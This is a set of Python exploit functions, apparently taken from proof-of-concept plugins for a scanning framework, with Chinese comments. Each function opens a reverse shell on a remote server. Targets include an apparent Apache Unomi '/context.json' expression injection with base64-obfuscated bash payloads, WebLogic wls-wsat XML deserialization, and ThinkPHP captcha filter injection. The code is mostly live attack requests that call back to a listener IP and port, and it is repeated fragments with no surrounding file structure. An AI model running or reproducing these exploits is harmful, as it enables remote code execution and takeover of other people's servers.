def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _shell(self):
result = {}
#执行反弹shell的请求
pocurl = self.url + '/context.json'
pocheaders = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
'Content-Type': 'application/json;charset=UTF-8',
'Content-Length': '1003',
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
IP = get_listener_ip()
PORT = get_listener_port()
# IP = yourlistenerip
# PORT = yourlistenerport
payload = 'bash -i >& /dev/tcp/' + IP + '/' + str(PORT) + ' 0>&1'
payload = 'bash -c {echo,' + (base64.b64encode(
payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
try:
r2 = requests.post(url=pocurl,
headers=pocheaders,
data=pocjson,
verify=False) #执行ping指令
except Exception as e:
logger.warn(str(e))
return self.parse_attack(result)
def _shell(self):
"""
shell模式下,只能运行单个PoC脚本,控制台会进入shell交互模式执行命令及输出
"""
cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
# 攻击代码 execute cmd
pass
def _options(self):
o = OrderedDict()
payload = {
"nc": REVERSE_PAYLOAD.NC,
"bash": REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()),
}
o["command"] = OptDict(selected="bash", default=payload)
return o
def _shell(self):
username = '******'
password = '******'
command = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
try:
start(self.url, command, username, password, shell=True)
except Exception as ex:
logger.error(str(ex))
def _shell(self):
vul_url = urljoin(self.url, '/wls-wsat/CoordinatorPortType')
cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1'.format(
get_listener_ip(), get_listener_port())
shell_payload = self.get_shell_payload('/bin/bash', '-c', cmd)
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
}
try:
requests.post(vul_url, data=shell_payload, headers=headers)
except Exception as e:
logger.warn(str(e))
def _shell(self):
vulurl = self.url + "/index.php?s=captcha"
# 生成写入文件的shellcode
_list = generate_shellcode_list(listener_ip=get_listener_ip(),
listener_port=get_listener_port(),
os_target=OS.LINUX,
os_target_arch=OS_ARCH.X86)
for i in _list:
data = {
'_method': '__construct',
'filter[]': 'system',
'method': 'get',
'server[REQUEST_METHOD]': i
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
requests.post(vulurl, data=data, headers=headers)